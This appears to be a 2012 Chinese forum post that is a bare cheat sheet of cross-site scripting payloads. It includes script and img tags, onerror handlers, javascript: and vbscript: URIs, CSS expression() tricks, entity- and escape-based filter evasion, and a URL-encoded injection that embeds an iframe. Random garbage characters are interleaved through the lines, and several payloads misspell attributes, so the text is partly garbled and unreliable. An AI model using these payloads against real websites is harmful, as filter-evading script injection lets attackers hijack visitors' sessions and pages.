<script>alert("跨站")</script> (最常用)8 v0 A# T$ i& h. j7 d; Z7 Z0 t
<img scr=javascript:alert("跨站")></img>
: ?' J7 N4 b6 i$ u$ O! D<img scr="javascript: alert(/跨站/)></img>* @* q/ Q' T. _8 O2 x1 F
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)% u- |# Y$ w S9 e
<img scr="#" onerror=alert(/跨站/)></img> z1 Y0 F9 Z7 |' `' L* c% a# }. O
<img scr="#" style="xss:expression(alert(/xss/));"></img>$ T% I! L# Z' I7 x) w
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
8 e$ Z) @- B7 U) P<img src=vbscript:msgbox ("xss")></img>
" p6 e( D" c' K<style> input {left:expression (alert('xss'))}</style>& C1 C0 \% W- R0 ^2 Y3 |
<div style={left:expression (alert('xss'))}></div>
# u& n" y$ @# Q( k! T% c<div style={left:exp/* */ression (alert('xss'))}></div>% F0 _$ Q; k8 \) z6 ?
<div style={left:\0065\0078ression (alert('xss'))}></div>: ~; i/ {" o/ Q4 ?+ K! Z
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
+ u: |9 ]* ?: Z& O3 ?) bunicode <div style="{left:expRessioN (alert('xss'))}">3 ?9 y \) F- T) @
. Y& k) ~, f5 M/ r! l3 Y"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["0 ]+ d2 ~5 R" [5 O h
|
发表于 2012-9-13 17:15:04
收藏
支持
反对